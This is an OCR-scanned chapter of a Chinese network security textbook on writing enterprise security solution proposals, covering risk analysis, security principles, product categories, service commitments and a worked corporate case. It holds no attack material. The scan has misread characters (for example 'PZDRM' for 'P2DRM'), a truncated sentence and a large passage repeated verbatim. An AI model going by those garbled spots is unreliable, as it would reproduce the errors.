在 实际 的 工作 中 ,怎样 才能 写 出 高 质量 、 高 水 平 的 安全 方案 ? 只 要 抓 住 重点 ,理解 安全 
理念 和 安全 过 程 ,基本 就 可 以 做 到 。 一 个 网 络 安全 方案 要 从 以 下 8 个 方面 来 把 握 。 

(1) 体现 唯一 性 ,由 于 安全 的 复杂 性 和 特殊 性 ,唯一 性 是 评估 安全 方案 最 重要 的 一 个 标 
准 。 实 际 中 ,每 一 个 特定 网 络 都 是 唯一 的 ,需要 根据 实际 情况 来 处 理 。 

(2) 对 安全 技术 和 安全 风险 有 一 个 综合 把 握 和 理解 ,包括 现在 和 将 来 可 能 出 现 的 所 有 
情况 。 

(3) 对 用 户 的 网 络 系统 可 能 遇 到 的 安全 风险 和 安全 威胁 ,结合 现 有 的 安全 技术 和 安全 
风险 ,要 有 一 个 合适 .中 肯 的 评估 ,不 能 夸大 ,也 不 能 缩小 。 

(4) 对 症 下 药 , 用 相应 的 安全 产品 、 安 全 技术 和 管理 手段 ,降低 用 户 的 网 络 系统 当前 可 
能 遇 到 的 风险 和 威胁 ,消除 风险 和 威胁 的 根源 ,增强 整个 网 络 系统 抵抗 风险 和 威胁 的 能 力 ， 
增强 系统 本 身 的 免疫 力 。 

(5) 方案 中 要 体现 出 对 用 户 的 服务 支持 ,这 是 很 重要 的 一 部 分 。 因 为 产品 和 技术 都 将 
会 体现 在 服务 中 ,服务 用 来 保证 质量 、 提 高 质量 。 

(6) 在 设计 方案 时 ,要 明白 网 络 系统 安全 是 一 个 动态 的 .整体 的 ,专业 的 工程 ,不 能 一 步 
到 位 解决 用 户 所 有 的 问题 。 

(7) 方案 出 来 后 ,要 不 断 与 用 户 进行 沟通 ,能 够 及 时 得 到 他 们 对 网 络 系统 在 安全 方面 的 
要 求 、. 期 望 和 所 遇 到 的 问题 。 

(8) 方案 中 所 涉及 的 产品 和 技术 ,都 要 经 得 起 验证 ,推荐 和 实施 , 既 要 有 理论 根据 ,也 要 

将 上 面 的 8 点 融会 贯通 ,经 过 不 断 地 学 习 和 经 验 积累 ,一 定 能 写 出 一 份 很 实用 、 很 中 肯 
的 安全 项 目 方案 。 一 份 好 的 解决 方案 要 求 技术 面 要 广 , 能 体现 综合 性 。 


6.1.1 设计 框架 

从 总 体 上 说 ,一 份 安全 解决 方案 的 框架 涉及 6 大 方面 ,可 以 根据 用 户 的 实际 需求 进行 
取舍 。 

1. 概要 安全 风险 分 析 


对 当前 的 安全 风险 和 安全 威胁 做 一 个 概括 和 分 析 , 最 好 能 够 突出 用 户 所 在 的 行业 ,并 结 
合 其 业务 的 特点 、 网 络 环境 和 应 用 系统 等 。 同 时 ,要 有 针对 性 ,如 政府 行业 、 电 力行 业 、 金 融 
行业 等 ,要 体现 很 强 的 行业 特点 ,使 人 信服 和 接受 。 

2. 实际 安全 风险 分 析 


实际 安全 风险 分 析 一 般 从 4 个 方面 进行 : 网 络 的 风险 和 威胁 分 析 , 系统 的 风险 和 威胁 
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分 析 , 应 用 的 风险 和 威胁 分 析 , 对 网 络 、 系 统 和 应 用 的 风险 及 威胁 的 实际 的 详细 分 析 。 

(1) 网 络 的 风险 和 威胁 分 析 : 详细 分 析 用 户 当 前 的 网 络 结构 , 找 出 带 来 安全 问题 的 关 
键 ,并 使 之 图 形 化 ,指出 风险 和 威胁 所 带 来 的 危害 ,对 如 果 不 消 除 这 些 风险 和 威胁 ,会 引起 什 
么 样 的 后 果 , 有 一 个 中 肯 ,详细 的 分 析 和 解决 方法 。 

(2) 系统 的 风险 和 威胁 分 析 : 对 用 户 所 有 的 系统 都 要 进行 一 次 详细 的 评估 ,分 析 存 在 
哪些 风险 和 威胁 ,并 根据 与 业务 的 关系 ,指出 其 中 的 利害 关系 。 要 运用 当前 流行 系统 所 面临 
的 安全 分 析 和 威胁 ,结合 用 户 的 实际 系统 ,给 出 一 个 中 肯 、 客 观 和 实际 的 分 析 。 

(3) 应 用 的 风险 和 威胁 分 析 : 应 用 的 安全 是 企业 的 关键 ,也 是 安全 方案 中 要 保护 的 对 
象 。 同 时 由 于 应 用 的 复杂 性 和 关联 性 ,分 析 时 要 进行 比较 和 综合 。 

(4) 对 网 络 、 系 统 和 应 用 的 风险 及 威胁 的 实际 的 详细 分 析 : 帮助 用 户 找 出 其 网 络 系统 
中 要 保护 的 对 象 ,帮助 用 户 分 析 网 络 系统 ,帮助 他 们 发 现 其 网 络 系统 中 存在 的 问题 ,以 及 采 
用 哪些 产品 和 技术 来 解决 。 

3. 网 络 系统 的 安全 原则 

安全 原则 体现 在 5 个 方面 : 动态 性 .唯一 性 .整体 性 .专业 性 和 严密 性 。 

(1) 动态 性 : 不 要 把 安全 静态 化 ,动态 性 是 安全 的 一 个 重要 的 原则 。 网 络 、 系 统 和 应 用 
会 不 断 出 现 新 的 风险 和 威胁 ,这 决定 了 安全 动态 性 的 重要 性 。 

(2) 唯一 性 : 安全 的 动态 性 决定 了 安全 的 唯一 性 ,针对 每 个 网 络 系统 安全 问题 的 解决 ， 
都 应 该 是 独一无二 的 。 

(3) 整体 性 : 对 网 络 系统 所 遇 到 的 风险 和 威胁 ,要 从 整体 来 分 析 和 把 握 , 不 能 哪里 有 问 
题 就 补 哪里 ,要 做 到 全 面 地 保护 和 评估 。 

(4) 专业 性 : 对 于 用 户 的 网 络 . 系统 和 应 用 ,要 从 专业 的 角度 来 分 析 和 把 握 , 不 能 是 一 
种 大 概 的 做 法 。 

(5) 严密 性 : 整个 解决 方案 要 有 很 强 的 严密 性 ,不 要 给 人 一 种 虚假 的 感觉 ,在 设计 方案 
的 时 候 , 要 从 多 方面 对 方案 进行 论证 。 

4. 安全 产品 

常用 的 安全 产品 有 5 种 : 防火 墙 \ 防 病毒 、 身 份 认 证 ,传输 加 密 和 入 侵 检 测 。 结 合用 户 
的 网 络 、 系 统 和 应 用 的 实际 情况 ,对 安全 产品 和 安全 技术 的 评估 和 分 析 , 分 析 要 客观 结论 要 
中 肯 ,帮助 用 户 选 择 最 能 解决 他 们 所 遇 到 问题 的 产品 ,不 要 求 新 `. 求 好 和 求 大 。 

(1) 防火 墙 : 对 包 过 滤 技术 .代理 技术 和 状态 检测 技术 的 防火 墙 ,都 做 一 个 概括 和 比 
较 , 结 合用 户 网 络 系统 的 特点 ,帮助 用 户 选择 一 种 安全 产品 ,对 于 选择 的 产品 ,一定 要 从 中 立 
的 角度 来 说 明 。 

(2) 防 病毒 : 针对 用 户 的 系统 和 应 用 的 特点 ,对 桌面 防 病毒 .服务 器 防 病毒 和 网 关 防 病 
毒 做 一 个 概括 和 比较 ,详细 指出 用 户 必须 如 何 做 ,否则 就 会 带 来 什么 样 的 安全 威胁 ,一 定 要 
中 肯 、 合 适 ,不 要 夸大 和 缩小 。 

(3) 身份 认证 : 从 用 户 的 系统 和 用 户 的 认证 的 情况 进行 详细 的 分 析 ,指出 网 络 和 应 用 
本 身 的 认证 方法 会 出 现 哪些 风险 ,结合 相关 的 产品 和 技术 ,通过 部 署 这 些 产 品 和 采用 相关 的 
安全 技术 ,能 够 帮助 用 户 解决 哪些 由 系统 和 应 用 的 传统 认证 方式 所 带 来 的 风险 和 威胁 。 

(4) 传输 加 密 : 要 用 加 密 技 术 来 分 析 , 指 出 明文 传输 的 巨大 危害 ,通过 结合 相关 的 加 密 
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分 析 , 应 用 的 风险 和 威胁 分 析 , 对 网 络 、 系 统 和 应 用 的 风险 及 威胁 的 实际 的 详细 分 析 。 

(1) 网 络 的 风险 和 威胁 分 析 : 详细 分 析 用 户 当 前 的 网 络 结构 , 找 出 带 来 安全 问题 的 关 
键 ,并 使 之 图 形 化 ,指出 风险 和 威胁 所 带 来 的 危害 ,对 如 果 不 消 除 这 些 风险 和 威胁 ,会 引起 什 
么 样 的 后 果 , 有 一 个 中 肯 ,详细 的 分 析 和 解决 方法 。 

(2) 系统 的 风险 和 威胁 分 析 : 对 用 户 所 有 的 系统 都 要 进行 一 次 详细 的 评估 ,分 析 存 在 
哪些 风险 和 威胁 ,并 根据 与 业务 的 关系 ,指出 其 中 的 利害 关系 。 要 运用 当前 流行 系统 所 面临 
的 安全 分 析 和 威胁 ,结合 用 户 的 实际 系统 ,给 出 一 个 中 肯 、 客 观 和 实际 的 分 析 。 

(3) 应 用 的 风险 和 威胁 分 析 : 应 用 的 安全 是 企业 的 关键 ,也 是 安全 方案 中 要 保护 的 对 
象 。 同 时 由 于 应 用 的 复杂 性 和 关联 性 ,分 析 时 要 进行 比较 和 综合 。 

(4) 对 网 络 、 系 统 和 应 用 的 风险 及 威胁 的 实际 的 详细 分 析 : 帮助 用 户 找 出 其 网 络 系统 
中 要 保护 的 对 象 ,帮助 用 户 分 析 网 络 系统 ,帮助 他 们 发 现 其 网 络 系统 中 存在 的 问题 ,以 及 采 
用 哪些 产品 和 技术 来 解决 。 

3. 网 络 系统 的 安全 原则 

安全 原则 体现 在 5 个 方面 : 动态 性 .唯一 性 .整体 性 .专业 性 和 严密 性 。 

(1) 动态 性 : 不 要 把 安全 静态 化 ,动态 性 是 安全 的 一 个 重要 的 原则 。 网 络 、 系 统 和 应 用 
会 不 断 出 现 新 的 风险 和 威胁 ,这 决定 了 安全 动态 性 的 重要 性 。 

(2) 唯一 性 : 安全 的 动态 性 决定 了 安全 的 唯一 性 ,针对 每 个 网 络 系统 安全 问题 的 解决 ， 
都 应 该 是 独一无二 的 。 

(3) 整体 性 : 对 网 络 系统 所 遇 到 的 风险 和 威胁 ,要 从 整体 来 分 析 和 把 握 , 不 能 哪里 有 问 
题 就 补 哪里 ,要 做 到 全 面 地 保护 和 评估 。 

(4) 专业 性 : 对 于 用 户 的 网 络 . 系统 和 应 用 ,要 从 专业 的 角度 来 分 析 和 把 握 , 不 能 是 一 
种 大 概 的 做 法 。 

(5) 严密 性 : 整个 解决 方案 要 有 很 强 的 严密 性 ,不 要 给 人 一 种 虚假 的 感觉 ,在 设计 方案 
的 时 候 , 要 从 多 方面 对 方案 进行 论证 。 

4. 安全 产品 

常用 的 安全 产品 有 5 种 : 防火 墙 \ 防 病毒 、 身 份 认 证 ,传输 加 密 和 入 侵 检 测 。 结 合用 户 
的 网 络 、 系 统 和 应 用 的 实际 情况 ,对 安全 产品 和 安全 技术 的 评估 和 分 析 , 分 析 要 客观 结论 要 
中 肯 ,帮助 用 户 选 择 最 能 解决 他 们 所 遇 到 问题 的 产品 ,不 要 求 新 `. 求 好 和 求 大 。 

(1) 防火 墙 : 对 包 过 滤 技术 .代理 技术 和 状态 检测 技术 的 防火 墙 ,都 做 一 个 概括 和 比 
较 , 结 合用 户 网 络 系统 的 特点 ,帮助 用 户 选择 一 种 安全 产品 ,对 于 选择 的 产品 ,一定 要 从 中 立 
的 角度 来 说 明 。 

(2) 防 病毒 : 针对 用 户 的 系统 和 应 用 的 特点 ,对 桌面 防 病毒 .服务 器 防 病毒 和 网 关 防 病 
毒 做 一 个 概括 和 比较 ,详细 指出 用 户 必须 如 何 做 ,否则 就 会 带 来 什么 样 的 安全 威胁 ,一 定 要 
中 肯 、 合 适 ,不 要 夸大 和 缩小 。 

(3) 身份 认证 : 从 用 户 的 系统 和 用 户 的 认证 的 情况 进行 详细 的 分 析 ,指出 网 络 和 应 用 
本 身 的 认证 方法 会 出 现 哪些 风险 ,结合 相关 的 产品 和 技术 ,通过 部 署 这 些 产 品 和 采用 相关 的 
安全 技术 ,能 够 帮助 用 户 解决 哪些 由 系统 和 应 用 的 传统 认证 方式 所 带 来 的 风险 和 威胁 。 

(4) 传输 加 密 : 要 用 加 密 技 术 来 分 析 , 指 出 明文 传输 的 巨大 危害 ,通过 结合 相关 的 加 密 
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产品 和 技术 ,指出 用 户 的 现 有 情况 存在 哪些 危害 和 风险 。 

(5) 人 侵 检测 : 对 入 侵 检测 技术 要 有 一 个 详细 的 解释 ,指出 在 用 户 的 网 络 和 系统 部 署 
了 相关 的 产品 之 后 ,对 现 有 的 安全 情况 会 产生 怎样 的 影响 。 结 合 相 关 的 产品 和 技术 ,指出 对 
用 户 的 系统 和 网 络 会 带 来 哪些 好 处 ,指出 为 什么 必须 要 这 样 做 ,不 这 样 做 会 怎么 样 ,会 带 来 
什么 样 的 后 果 。 

5. 风险 评估 

风险 评估 是 工具 和 技术 的 结合 ,通过 这 两 个 方面 的 结合 ,给 用 户 一 种 很 实际 的 感觉 ,使 
用 户 感 到 这 样 做 以 后 ,会 对 他 们 的 网 络 产 生 一 个 很 大 的 影响 。 

6. 安全 服务 

安全 服务 不 是 产品 化 的 东西 ,而 是 通过 技术 向 用 户 提供 的 持久 支持 。 对 于 不 断 更 新 的 
安全 技术 ,安全 风险 和 安全 威胁 ,安全 服务 的 作用 变 得 越 来 越 重 要 。 

(1) 网 络 拓扑 安全 : 结合 网 络 的 风险 和 威胁 ,详细 分 析 用 户 的 网 络 拓扑 结构 ,根据 其 特 
点 ,指出 现在 和 将 来 会 存在 哪些 安全 风险 和 威胁 ,并 运用 相关 的 产品 和 技术 ,来 帮助 用 户 消 
除 产 生 风 险 和 威胁 的 根源 。 

(2) 系统 安全 加 固 : 通过 风险 评估 和 人 工分 析 , 找 出 用 户 的 相关 系统 已 经 存在 或 是 将 
来 会 存在 的 风险 和 威胁 ,并 运用 相关 的 产品 和 技术 ,来 加 固 用 户 的 系统 安全 。 

(3) 应 用 安全 : 结合 用 户 的 相关 应 用 程序 和 后 台 支 撑 系 统 , 通 过 相应 的 风险 评估 和 人 
工分 析 , 找 出 用 户 和 相关 应 用 已 经 存在 或 是 将 来 会 存在 的 风险 ,并 运用 相关 的 产品 和 技术 ， 
来 加 固 用 户 的 应 用 安全 。 

(4) 灾难 恢复 : 结合 用 户 的 网 络 、 系 统 和 应 用 ,通过 详细 的 分 析 、 针 对 可 能 遇 到 的 灾难 ， 
制定 出 一 份 详细 的 恢复 方案 ,把 由 于 其 他 突 发 情况 所 带 来 的 风险 降 到 最 低 , 并 有 一 个 良好 的 
应 对 方案 。 

(5) 紧急 响应 : 对 于 突 发 的 安全 事件 需要 采用 相关 的 处 理 流程 ,比如 服务 器 死机 、 停 
电 等 。 

(6) 安全 规范 : 制定 出 一 套 完善 的 安全 方案 ,比如 IP 地 址 固定 、 离 开 计算 机 时 需要 锁定 
等 。 结 合 实际 分 成 多 套 方案 ,如 系统 管理 员 安 全 规范 、 网 络 管理 员 安 全 规范 、 高 层 领导 的 安 
全 规范 ,普通 员工 的 管理 规范 、 设 备 使 用 规范 和 安全 环境 规范 。 

(7) 服务 体系 和 培训 体系 : 提供 售 前 和 售后 服务 ,并 提供 安全 产品 和 技术 的 相关 培训 。 


6.1.2 需求 分 析 


项 目 名 称 是 : 某 特定 信息 集团 公司 网 络 信息 系统 的 安全 管理 。 

某 特定 网 络 安全 公司 通过 招标 ,以 50 万 元 人 民 币 的 工程 造价 得 到 该 项 目的 实施 权 。 在 
解决 方案 设计 中 需要 包含 9 方面 的 内 容 : 公司 背景 简介 、 某 特定 信息 集团 的 安全 风险 分 析 、 
完整 网 络 安全 实施 方案 的 设计 、 实 施 方案 计划 技术 支持 和 服务 承诺 .产品 报价 .产品 介绍 、 
第 三 方 检测 报告 和 安全 技术 培训 。 

1. 安全 要 求 

集团 在 网 络 安全 方面 提出 5 方面 的 要 求 。 

(1) 安全 性 。 全 面 有 效 地 保护 企业 网 络 系统 的 安全 ,保护 计算 机 硬件 .软件 数据、 网 络 
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不 因 偶 然 的 或 恶意 破坏 的 原因 使 数据 遭 到 更 改 、. 泄 露 和 丢失 ,确保 数据 的 完整 性 。 

(2) 可 控 性 和 可 管理 性 。 可 自动 和 手动 分 析 网 络 安全 状况 ,适时 检测 并 及 时 发 现 记 录 
潜在 的 安全 威胁 ,制定 安全 策略 ,及 时 报警 、 阻 断 不 良 攻 击 行为 ,具有 很 强 的 可 控 性 和 可 管 
理性 。 

(3) 系统 的 可 用 性 。 在 某 部 分 系统 出 现 问题 时 ,不 影响 企业 信息 系统 的 正常 运行 ,具有 
很 强 的 可 用 性 和 及 时 恢复 性 。 

(4) 可 持续 发 展 。 满 足 某 特定 信息 集团 公司 业务 需求 和 企业 可 持续 发 展 的 要 求 ,具有 
很 强 的 可 扩展 性 和 柔 蔬 性 。 

(5) 合法 性 。 所 采用 的 安全 设备 和 技术 具有 我 国安 全 产品 管理 部 门 的 合法 证 明 。 

2. 工作 任务 

(1) 研究 某 特定 信息 集团 公司 计算 机 网 络 系统 (包括 各 级 机 构 ,基层 生产 单位 和 移动 用 
户 的 广域网 ) 的 运行 情况 (包括 网 络 结构 性能、 信息 点 数量 .采取 的 安全 措施 等 ) ,对 网 络 面 
临 的 威胁 及 可 能 承担 的 风险 进行 定性 与 定量 的 分 析 和 评估 。 

(2) 研究 某 特定 信息 集团 公司 的 计算 机 操作 系统 (包括 服务 器 操作 系统 、 客 户 端 操作 系 
统 等 ) 的 运行 情况 (包括 操作 系统 的 版 本 、 提 供 的 用 户 权限 分 配 策 略 等 ) ,在 了 解 操作 系统 最 
新 发 展 趋势 的 基础 上 ,对 操作 系统 本 身 的 缺陷 及 可 能 承担 的 风险 进行 定性 与 定量 的 分 析 和 
评估 。 

(3) 研究 某 特定 信息 集团 公司 的 计算 机 应 用 系统 (包括 信息 管理 系统 、 办 公 自 动 化 系 
统 、 运 行 实时 管理 系统 、 地 理 信息 系统 和 Internet/Intranet 信息 发 布 系统 等 ) 的 运行 情况 ( 包 
括 应 用 体系 结构 .开发 工具 数据库 软件 和 用 户 权 限 分 配 策略 等 ) ,在 满足 各 级 管理 人 员 、 业 
务 操作 人 员 业 务 需 求 的 基础 上 ,对 应 用 系统 存在 的 问题 面临 的 威胁 及 可 能 承担 的 风险 进行 
定性 与 定量 的 分 析 和 评估 。 

(4) 根据 以 上 的 定性 与 定量 的 评估 ,结合 用 户 需求 和 国内 外 网 络 安全 领域 的 最 新 发 展 
趋势 ,有 针对 性 地 制定 某 特定 信息 集团 公司 计算 机 网 络 系统 的 安全 策略 和 解决 方案 ,确保 该 
集团 计算 机 网 络 信息 系统 安全 可 靠 地 运行 。 


6.1.3 解决 方案 


1. 网 络 安全 公司 的 背景 

介绍 某 特 定 网 络 安全 公司 的 背景 ,通常 包括 公司 简介 .公司 人 员 结 构 .曾经 成 功 的 案例 、 
产品 或 者 服务 的 许可 证 或 认证 。 

(1) 某 特定 网 络 安全 公司 简介 。 某 特定 网 络 安全 公司 于 2004 年 成 立 并 通过 ISO9001 
认证 ,注册 资本 1000 万 元 人 民 币 。 公 司 主要 提供 网 络 安全 产品 和 网 络 安全 解决 方案 ,公司 
的 安全 理念 是 PZDRM,P2DRM 将 给 用 户 带 来 稳定 安全 的 网 络 环境 ,P2DRM 策略 覆盖 了 安 
全 项 目 中 的 产品 ,技术 、 服 务 、 管 理 和 策略 等 内 容 , 是 一 个 完善 .严密 、 整 体 和 动态 的 安全 
理念 。 

@ 综合 的 网 络 安全 策略 (Policy) ,也 就 是 P2ZDRM 的 第 一 个 P, 结 合用 户 的 网 络 系统 实 
际 情况 来 实施 ,包括 环境 安全 策略 .系统 安全 策略 、 网 络 安全 策略 等 。 

@ 全 面 的 网 络 安全 保护 (Protect) ,P2DRM 中 的 第 二 个 P, 提 供 全 面 的 保护 措施 ,包括 
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安全 产品 和 技术 ,要 结合 用 户 网 络 系统 的 实际 情况 来 介绍 ,内 容 包 括 防火 墙 保护 、 防 病毒 保 
护 、 身 份 验证 保护 、 入 侵 检测 保护 。 

@ 连续 的 安全 风险 监测 (Detect),P2DRM 中 的 D, 通 过 评估 工具 、 漏 洞 检测 技术 和 安 
全 人 员 , 对 用 户 的 网 络 、 系 统 和 应 用 中 可 能 存在 的 安全 风险 和 威胁 ,进行 全 面 的 检测 。 

@ 及 时 的 安全 事故 响应 (Response) ,P2DRM 中 的 第 一 个 R, 对 用 户 的 网 络 、 系 统 和 应 
用 可 能 遇 到 的 安全 入 侵 事 件 及 时 做 出 相应 的 处 理 。 

@@ 迅速 的 安全 灾难 恢复 (Recovery),P2DRM 中 的 第 二 个 R, 当 网 页 文件 数据库、 网 
络 和 系统 等 遇 到 的 破坏 时 ,采用 迅速 恢复 技术 。 

@ 优质 的 安全 管理 服务 (Management),P2DRM 中 的 M, 在 安全 项 目 中 ,管理 是 项 目 
实施 成 功 的 有 效 保 证 。 

(2) 公司 的 人 员 结构 。 某 特定 网 络 安全 公司 现 有 管理 人 员 20 名 ,技术 人 员 200 名 , 销 
售 人 员 400 名 。 其 中 具有 副 高 级 职称 以 上 的 有 39 名 ,教授 或 者 研究 员 12 名 ,院士 2 人 , 硕 
土 学 位 以 上 人 员 占 所 有 人 员 的 比例 为 49% ,是 一 个 知识 性 、 技 术 性 的 高 科技 公司 。 

(3) 成 功 案例 。 这 里 主要 介绍 公司 以 往 的 成 功 案例 ,特别 是 要 指出 与 用 户 项 目 相 似 的 
项 目 ,这 样 使 用 户 相信 公司 有 足够 的 经 验 来 做 好 这 件 事情 。 

(4) 产品 的 许可 证 或 服务 认证 。 产 品 的 许可 证 ,是 不 可 缺少 的 材料 ,因为 只 有 取得 了 许 
可 证 的 安全 产品 , 才 允 许 在 国内 销售 。 网 络 安全 属于 提供 服务 的 公司 ,通过 国际 认证 大 大 有 
利于 得 到 用 户 的 信任 。 

(5) 某 特定 信息 集团 实施 网 络 安全 意义 。 这 一 部 分 着 重 写 出 当 项 目 完成 以 后 , 某 特定 信 
息 集团 公司 的 系统 信息 安全 能 够 达到 一 个 怎样 的 安全 保护 水 平 ,特别 是 要 结合 当前 的 安全 
风险 和 威胁 来 分 析 。 

2. 安全 风险 分 析 

安全 风险 分 析 就 是 对 网 络 物理 结构 、 网 络 系统 和 应 用 进行 风险 分 析 。 

(1) 现 有 网 络 物理 结构 安全 分 析 。 详 细 分 析 某 特定 信息 集团 公司 与 分 公司 的 网 络 结 
构 , 包 括 内 部 网 、 外 部 网 和 远程 网 。 

(2) 网 络 系统 安全 分 析 。 详 细 分 析 某 特定 信息 集团 公司 与 各 分 公司 网 络 的 实际 连接 、 
Internet 的 访问 情况 、 桌 面 系统 的 使 用 情况 和 主机 系统 的 使 用 情况 , 找 出 可 能 存在 的 安全 
风险 。 

(3) 网 络 应 用 的 安全 分 析 。 详 细 分 析 某 特定 信息 集团 公司 与 各 分 公司 的 所 有 服务 系统 
各 应 用 系统 , 找 出 可 能 存在 的 安全 风险 。 

综 上 所 述 ,解决 方案 包括 5 个 方面 : 

(1) 建立 某 特 定 信息 集团 公司 系统 信息 安全 体系 结构 框架 。 通 过 具体 分 析 某 特定 信息 
集团 公司 的 具体 业务 和 网 络 、 系 统 、 应 用 等 的 实际 情况 ,初步 建立 一 个 整体 的 安全 体系 框架 。 

(2) 技术 实施 策略 。 

技术 实施 策略 需要 从 8 个 方面 进行 曾 述 。 

@ 网 络 结构 安全 : 通过 以 上 的 风险 分 析 , 找 出 网 络 结构 可 能 出 现 的 问题 ,采用 相关 的 
安全 产品 和 技术 ,解决 网 络 结构 的 安全 风险 和 威胁 。 

@ 主机 安全 加 固 : 通过 以 上 的 风险 分 析 , 找 出 主机 系统 可 能 出 现 的 问题 ,采用 相关 的 
安全 产品 和 技术 ,解决 主机 系统 的 安全 风险 和 威胁 。 


2 网 络 安 全 教程 与 实践 (第 2 版 ) 





@ 防 病毒 : 阐述 如 何 实施 桌面 防 病毒 .服务 器 防 病毒 .邮件 防 病毒 .网 关 防 病毒 及 统一 
防 病毒 解决 方案 。 

@ 访问 控制 : 3 种 基本 的 访问 控制 技术 是 路 由 器 过 滤 访 问 控制 技术 .防火墙 访问 控制 
技术 和 主机 自身 访问 控制 技术 。 

@ 传输 加 密 : 通过 采用 相关 的 加 密 产 品 和 加 密 技术 ,保护 某 特定 信息 集团 公司 的 信息 
传输 安全 ,实现 信息 传输 的 机 密 性 、 完 整 性 和 可 用 性 。 

@ 身份 认证 : 通过 采用 相关 的 身份 认证 产品 和 技术 ,保护 重要 应 用 系统 的 身份 认证 ， 
实现 信息 使 用 的 加 密 性 和 可 用 性 。 

@ 〇 入 侵 检 测 技 术 : 通过 采用 相关 的 入 侵 检 测 产 品 和 技术 ,对 网 络 和 重要 主机 系统 进行 
实时 监控 。 

风险 评估 : 通过 采用 相关 的 风险 评估 工具 和 技术 ,对 网 络 和 重要 主机 系统 进行 连续 
的 风险 和 威胁 分 析 。 

(3) 安全 管理 工具 。 对 安全 项 目 中 所 用 到 的 安全 产品 进行 集中 统一、 安全 的 管理 和 
培训 。 

(4) 紧急 响应 。 制 定 详细 的 紧急 响应 计划 ,及 时 响应 用 户 的 网 络 、 系 统 和 应 用 可 能 会 遭 
到 的 破坏 。 

(5) 灾难 恢复 。 制 定 详细 的 灾难 恢复 计划 ,及 时 地 把 用 户 遇 到 的 网 络 、 系 统 和 应 用 的 破 
坏 恢 复 到 正常 状态 ,并且 能 够 消除 产生 风险 和 威胁 的 根源 。 


6.1.4 网 络 安全 方案 设计 实例 


本 节 通 过 一 个 具体 案例 介绍 企业 网 络 安全 规划 设计 的 具体 实施 ,包括 安全 规划 设计 原 
则 ,策略 的 制定 、 各 种 安全 技术 ,如 防火 墙 技 术 、VPN 技术 .加 密 技 术 . 认 证 技术 和 访问 控制 
等 综合 应 用 。 

1. 需求 分 析 

首先 对 项 目 进行 需求 分 析 : 

(1) 项 目 背景 。 某 大 型 企业 有 6 个 子 公 司 , 各 子 公司 的 业务 通过 一 个 信息 平台 进行 统 
一 管理 ,协调 处 理 。 

(2) 建设 目标 。 实 现 现 代 化 网 络 办 公 , 提 供 信 息 共享 和 交流 的 环境 ,协同 工作 的 能 力 ， 
保证 公司 业务 的 有 序 进行 ,产生 增值 效应 。 

(3) 系统 安全 建设 的 意义 。 满 足 业 务 应 用 需要 ,根本 上 解决 企业 安全 问题 ,营造 一 个 安 
全 的 企业 网 络 环境 ,提供 整体 安全 实施 策略 。 

1) 网 络 系统 基本 需求 

(1) 多 业务 的 承载 能 力 和 可 靠 的 网 络 性 能 ; 

(2) 先进 的 流量 管理 能 力 和 合理 分 配 网 络 资源 ; 

(3) 灵活 的 组 网 能 力 和 服务 质量 保证 ; 

(4) 能 够 提供 各 种 网 络 接 入 方式 ; 

(5) 网 络 扩 展 性 好 ,能 够 方便 地 进行 网 络 扩 容 或 优化 ; 

(6) 支持 多 种 网 络 安全 策略 ,在 保证 网 络 系统 具有 高 度 保密 性 的 同时 ,确保 网 络 互联 互 
通 性 ; 
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(7) 对 平台 的 传输 通道 加 密 和 对 传输 的 数据 进行 加 密 ; 

(8) 实现 灵活 的 访问 控制 功能 和 完备 的 安全 审计 功能 ; 

(9) 统一 的 网 络 管理 ,使 网 络 系统 能 更 加 有 效 地 运行 ; 

(10) 保证 企业 网 络 平台 稳定 有 效 地 运行 ,能 快速 解决 出 现 的 故障 ,确保 该 系统 的 运行 ， 
节省 运营 资金 。 

2) 安全 保障 体系 需求 

企业 网 络 安全 保障 体系 需求 主要 包括 如 下 几 个 方面 ， 

(1) 建立 完备 的 备份 .恢复 机 制 ; 

(2) 合理 划分 安全 域 , 控 制 用 户 的 访问 区 域 与 权限 ， 

(3) 提供 多 种 数据 传输 模式 ,优先 使 用 国产 设备 和 软件 ; 

(4) 建立 计算 机 病毒 防护 体系 ,建立 统一 的 身份 认证 机 制 ; 

(5) 加 强 对 安全 事件 的 检测 和 审计 ,建立 完善 的 安全 保障 组 织 机 构 ,建立 完善 的 安全 管 
理 机 制 ,建立 完善 的 安全 管理 咨询 .评估 、 规 划 、 实 施 及 培训 制度 。 

2. 提出 设计 方案 

根据 需求 分 析 , 提 出 如 下 设计 方案 : 

1) 安全 体系 结构 分 析 

(1) 物理 安全 。 网 络 的 物理 安全 主要 是 指 地 震 、 水 灾 、 火 灾 等 环境 事故 ; 电源 故障 ,人 
为 操作 失误 或 错误 ,设备 被 咨 、 被 毁 ; 电磁 干扰 ,线路 截获 ,以 及 高 可 用 性 的 硬件 、 双 机 多 元 
余 的 设计 、 机 房 环境 及 报警 系统 .安全 意识 等 。 它 是 整个 网 络 系统 安全 的 前 提 , 在 这 个 企业 
网 络 内 ,由 于 网 络 的 物理 跨度 大 ,只 制定 健全 的 安全 管理 制度 是 不 够 的 ,还 要 做 好 备份 ,并且 
加 强 网 络 设备 和 机 房 的 管理 。 

(2) 网 络 安全 。 网 络 安全 指 在 数据 传输 和 网 络 连接 方面 存在 的 安全 隐患 。 涉 及 的 方面 
包括 数据 传输 安全 和 网 络 边界 安全 。 

(3) 系统 安全 。 系 统 安 全 指 企业 网 络 所 采用 的 操作 系统 .数据 库 及 相关 商用 软件 产品 
的 安全 漏洞 和 计算 机 病毒 对 应 用 系统 造成 的 威胁 。 涉 及 的 方面 包括 系统 漏洞 风险 ,病毒 人 
侵 风 险 和 非法 入 侵 风 险 。 

(4) 应 用 安全 。 应 用 安全 指 角色 及 用 户 管理 .身份 认证 、 权 限 管 理 和 数据 传输 等 方面 的 
安全 威胁 。 涉 及 的 方面 包括 角色 管理 .用户 管 理 、. 授 权 管理 .用户 认 证 和 数据 安全 。 

(5) 网 络 管理 安全 。 网 络 管理 安全 涉及 的 方面 包括 组 织 管理 .制度 管理 .人 员 管 理 和 安 
全 审计 系统 。 

2) 安全 方案 设计 

(1) 整体 方案 。 企 业 网 络 的 管理 信息 平台 分 为 内 部 平台 和 外 部 平台 。 其 中 内 部 平台 为 
数据 中 心 ,外 部 平台 为 信息 平台 的 使 用 者 和 项 目 参 与 方 。 

(2) 安全 管理 方案 。 制 定 健全 的 安全 管理 体制 将 是 网 络 安全 得 以 实现 的 重要 保证 。 企 
业 网 络 根据 自身 的 实际 情况 ,制定 如 安全 操作 流程 .安全 事故 的 奖 罚 制度 ,以 及 对 安全 管理 
人 员 的 考查 等 。 

